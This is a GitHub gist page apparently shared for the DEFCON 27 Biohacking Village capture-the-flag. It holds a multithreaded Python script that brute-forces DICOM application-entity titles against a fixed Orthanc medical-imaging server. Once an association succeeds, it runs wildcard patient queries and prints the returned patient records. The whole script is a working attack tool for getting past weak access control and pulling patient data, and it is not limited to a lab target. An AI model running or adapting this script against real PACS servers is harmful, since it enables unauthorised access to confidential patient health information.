Skip to content

Instantly share code, notes, and snippets.

@itsmenaga
Forked from ianatha/dicom-bruteforce.py
Created April 29, 2020 18:11
Show Gist options
  • Save itsmenaga/df4aa8ddb2127049e065f1dfff759f83 to your computer and use it in GitHub Desktop.
Save itsmenaga/df4aa8ddb2127049e065f1dfff759f83 to your computer and use it in GitHub Desktop.
DEFCON 27 BHV CTF
#!/usr/bin/env python3
# run me with ulimit -n 2048
import itertools
import string
from pydicom.dataset import Dataset
from pynetdicom import AE, QueryRetrievePresentationContexts
from pynetdicom.sop_class import PatientRootQueryRetrieveInformationModelFind
import sys
import time
import concurrent.futures
import random
def chunks(iterable, max=10):
    """Return an iterator over the next batch of at most ``max`` items.

    The first item is pulled eagerly, so an exhausted input is reported
    immediately by ``StopIteration`` escaping from this call; callers can use
    that as the "no more batches" signal. The remaining items are consumed
    lazily, so drain the returned iterator before asking for the next batch
    from the same underlying iterator.

    Args:
        iterable: Source of items. Pass an iterator (rather than a
            re-iterable container) when calling repeatedly, so each call
            continues where the previous batch stopped.
        max: Upper bound on the batch size; must be at least 1. The name
            shadows the builtin but is kept so keyword callers still work.

    Returns:
        An iterator yielding between 1 and ``max`` items.

    Raises:
        ValueError: If ``max`` is smaller than 1.
        StopIteration: If ``iterable`` has no items left.
    """
    if max < 1:
        raise ValueError("max must be at least 1")
    iterator = iter(iterable)
    first = next(iterator)
    # One item is already in hand, so take at most ``max - 1`` more; taking
    # ``max`` more would make every batch one item larger than requested.
    return itertools.chain((first,), itertools.islice(iterator, max - 1))
def ae_title_generator():
    """Yield every string of uppercase letters A-Z with length 2 through 9.

    Shorter strings come first; within one length the order is the one
    ``itertools.product`` produces ("AA", "AB", ..., "ZZ", "AAA", ...).
    """
    letters = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
    for length in range(2, 10):
        # product() yields tuples of characters; join each into one string.
        yield from map("".join, itertools.product(letters, repeat=length))
def attempt_connection(client_ae, server_ae, host, port):
    """Associate with a DICOM server under ``client_ae`` and run a C-FIND.

    Args:
        client_ae: AE title used for the local application entity.
        server_ae: AE title passed to ``associate`` for the remote peer.
        host: Address of the remote server.
        port: TCP port of the remote server.

    Returns:
        ``None`` when the association was established (progress and any
        responses are printed), or the string ``"bad_server_ae"`` when it
        was not.
    """
    ae = AE(ae_title=client_ae)
    ae.requested_contexts = QueryRetrievePresentationContexts
    ae.add_requested_context(PatientRootQueryRetrieveInformationModelFind)
    assoc = ae.associate(host, port, ae_title=server_ae)
    if not assoc.is_established:
        print("bad server")
        return "bad_server_ae"

    # Release the association even if the query raises, so a failure does
    # not leave the connection open.
    try:
        print(f"trying {client_ae}")
        ds = Dataset()
        ds.QueryRetrieveLevel = 'PATIENT'
        ds.PatientName = '**'
        ds.ReferringPhysicianName = '**'
        responses = assoc.send_c_find(ds, PatientRootQueryRetrieveInformationModelFind)
        for status, identifier in responses:
            # NOTE(review): any truthy status is reported as success; this
            # presumably distinguishes "got a response" from an empty status
            # -- confirm against the pynetdicom send_c_find documentation.
            if status:
                print(f"Success with {client_ae}")
                print(f"{status}\t{identifier}")
            else:
                print(f"fail {client_ae}")
    finally:
        assoc.release()
    return None
def worker(pw, addr, port):
    """Print the candidate ``pw`` and try it as the client AE title.

    The remote AE title is fixed to ``b'ORTHANC2'``. Returns whatever
    ``attempt_connection`` returns for this candidate.
    """
    # NOTE(review): the server title is bytes while ``pw`` is str -- confirm
    # the installed pynetdicom version accepts a bytes AE title.
    server_title = b'ORTHANC2'
    print(pw)
    outcome = attempt_connection(pw, server_title, addr, port)
    return outcome
def main():
    """Try generated AE titles against a fixed server, one batch at a time.

    Candidates from ``ae_title_generator`` are submitted to a thread pool in
    batches obtained from ``chunks``; every truthy worker result is printed.
    The loop ends cleanly once the generator has no candidates left.
    """
    addr = '10.0.0.160'
    port = 104
    timeout = 30
    batch_size = 128
    gen = ae_title_generator()
    with concurrent.futures.ThreadPoolExecutor(max_workers=batch_size) as executor:
        while True:
            # chunks() signals an exhausted generator by raising
            # StopIteration; treat that (or an empty batch) as the normal end
            # of the run instead of letting it surface as a traceback.
            try:
                batch = list(chunks(gen, batch_size))
            except StopIteration:
                break
            if not batch:
                break
            future_tasks = {executor.submit(worker, pw, addr, port): pw for pw in batch}
            try:
                for future in concurrent.futures.as_completed(future_tasks, timeout=timeout):
                    # Handle each failure individually so one bad attempt
                    # does not hide the results of the rest of the batch.
                    try:
                        result = future.result()
                    except Exception as e:
                        print(e)
                        continue
                    if result:
                        print(result)
            except concurrent.futures.TimeoutError as e:
                # Attempts still pending after `timeout` seconds are left
                # running; report the timeout and move on to the next batch.
                print(e)
# Script entry point. There is no __main__ guard, so this call also runs
# when the file is imported as a module.
main()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment